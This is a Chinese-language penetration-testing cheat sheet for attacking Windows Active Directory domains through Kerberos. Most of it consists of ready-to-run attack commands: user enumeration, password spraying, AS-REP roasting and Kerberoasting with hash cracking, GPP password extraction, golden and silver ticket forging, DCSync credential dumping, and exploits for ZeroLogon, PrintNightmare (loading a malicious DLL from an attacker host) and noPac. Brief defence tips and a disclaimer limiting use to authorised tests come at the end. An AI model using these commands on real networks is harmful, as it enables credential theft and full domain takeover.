Kerberos域渗透技术详解

1. 域环境发现

方法1：域内主机检测

net config workstation  # 查看工作站域信息

方法2：网络扫描

fscan_amd64 -np -m netbios -h 192.168.1.1/24  # 扫描NetBIOS服务
nmap -p 88,389 <IP>  # 检测Kerberos(88)和LDAP(389)端口

2. 域用户枚举

原理：利用Kerberos预认证错误响应差异

kerbrute userenum --dc <DC_IP> -d <DOMAIN> users.txt

3. AS-REP Roasting攻击

条件：用户设置了"不需要预认证"

GetNPUsers.py -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASS>
# 无凭证时：
GetNPUsers.py -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt

4. 密码喷洒攻击

kerbrute passwordspray --dc <DC_IP> -d <DOMAIN> users.txt Password123
kerbrute bruteuser --dc <DC_IP> -d <DOMAIN> passwords.txt admin

5. 定位域管

net group "Domain Admins" /domain
net group "Domain Controllers" /domain

# 使用PsLoggedon查看登录记录
PsLoggedon.exe -accepteula administrator

6. Kerberoasting攻击

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASS> -outputfile hashes
john --wordlist=passwords.txt hashes

7. GPP密码提取

Get-GPPPassword.py <DOMAIN>/<USER>:<PASS>@<DC_IP>

8. 黄金票据(Golden Ticket)

ticketer.py -nthash <KRBTGT_HASH> -domain-sid <SID> -domain <DOMAIN> administrator
export KRB5CCNAME=administrator.ccache

9. 白银票据(Silver Ticket)

ticketer.py -nthash <SERVICE_HASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> administrator

10. DCSync攻击

mimikatz # lsadump::dcsync /domain:<DOMAIN> /user:administrator

11. 经典漏洞利用

MS14-068：

ms14-068.exe -u <USER>@<DOMAIN> -p <PASS> -d <DC_IP> -s <SID>

ZeroLogon(CVE-2020-1472)：

zerologon_tester.py <DC_NAME> <DC_IP>
cve-2020-1472-exploit.py <DC_NAME> <DC_IP>

Print Spooler(CVE-2021-1675)：

# 需配置匿名SMB共享
CVE-2021-1675.py <USER>:<PASS>@<DC_IP> '\\<ATTACKER_IP>\share\malicious.dll'

sAMAccountName欺骗(CVE-2021-42278/42287)：

# noPac利用
sam_the_admin.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -shell

防御建议

1. 禁用不必要的Kerberos预认证
2. 定期轮换KRBTGT账户密码
3. 监控异常Kerberos票据请求
4. 及时安装安全补丁
5. 限制域管理员登录范围

工具集合

• Impacket工具包
• Kerbrute
• Mimikatz
• Rubeus
• BloodHound

注：所有攻击手法仅限授权测试使用，未经授权测试属于违法行为。